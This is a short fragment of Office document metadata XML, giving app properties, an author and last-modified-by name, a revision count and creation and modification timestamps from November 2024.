  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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waleed mohammed</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ahmed waleed mohammed</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-18T21:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-18T21:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>